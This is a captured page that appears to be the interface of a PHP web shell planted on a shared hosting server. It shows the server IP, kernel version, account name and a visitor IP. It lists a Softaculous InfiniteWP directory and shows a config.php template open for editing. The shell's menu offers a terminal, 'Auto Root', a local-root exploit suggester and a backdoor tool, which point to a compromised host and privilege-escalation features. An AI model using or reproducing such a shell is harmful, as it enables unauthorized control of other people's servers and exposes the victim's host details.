Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.248 & Your IP : 216.73.216.104
Domains :
Cant Read [ /etc/named.conf ]
User : tailxcij
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
iwp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
php53
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
php56
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
php71
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
php81
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
php82
[ DIR ]
drwxr-xr-x
2026-01-05 23:23
clone.php
4.76
KB
-rw-r--r--
2026-01-05 11:03
config.php
1.1
KB
-rw-r--r--
2026-01-05 09:44
edit.php
4.36
KB
-rw-r--r--
2026-01-05 11:03
edit.xml
447
B
-rw-r--r--
2025-06-25 07:18
fileindex.php
281
B
-rw-r--r--
2025-06-25 07:16
import.php
3.21
KB
-rw-r--r--
2026-01-05 11:03
info.xml
2.18
KB
-rw-r--r--
2026-01-05 09:44
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
4.68
KB
-rw-r--r--
2026-01-05 11:03
install.xml
1.09
KB
-rw-r--r--
2021-12-23 11:54
iwp.sql
20.8
KB
-rw-r--r--
2026-01-05 09:44
iwp.zip
6.98
MB
-rw-r--r--
2026-01-05 09:44
md5
1.37
KB
-rw-r--r--
2026-01-05 11:03
notes.txt
818
B
-rw-r--r--
2025-06-26 11:07
Save
Rename
<?php #Show Error define('APP_SHOW_ERROR', true); @ini_set('display_errors', (APP_SHOW_ERROR) ? 'On' : 'Off'); error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT); if(defined('E_DEPRECATED')) { error_reporting(error_reporting() & ~E_DEPRECATED); } if(function_exists('phpversion')){ if(version_compare(phpversion(),'8.0.0','>=')){ error_reporting(error_reporting() & ~E_WARNING); define('IWP_PHP8',true); } } define('SHOW_SQL_ERROR', APP_SHOW_ERROR); define('APP_VERSION', '3.5.2'); define('APP_INSTALL_HASH', '[[APP_INSTALL_HASH]]'); define('APP_ROOT', dirname(__FILE__)); define('APP_DOMAIN_PATH', '[[softurl_no_http]]/'); define('APP_V3', 1); define('APP_ROOT_V2', dirname(__FILE__)); define('APP_DOMAIN_PATH_V2', '[[softurl_no_http]]/'); define('EXECUTE_FILE', 'execute.php'); define('DEFAULT_MAX_CLIENT_REQUEST_TIMEOUT', 180);//Request to client wp $config = array(); $config['SQL_DATABASE'] = '[[softdb]]'; $config['SQL_HOST'] = '[[softdbhost]]'; $config['SQL_USERNAME'] = '[[softdbuser]]'; $config['SQL_PASSWORD'] = '[[softdbpass]]'; $config['SQL_PORT'] = '3306'; $config['SQL_TABLE_NAME_PREFIX'] = '[[dbprefix]]';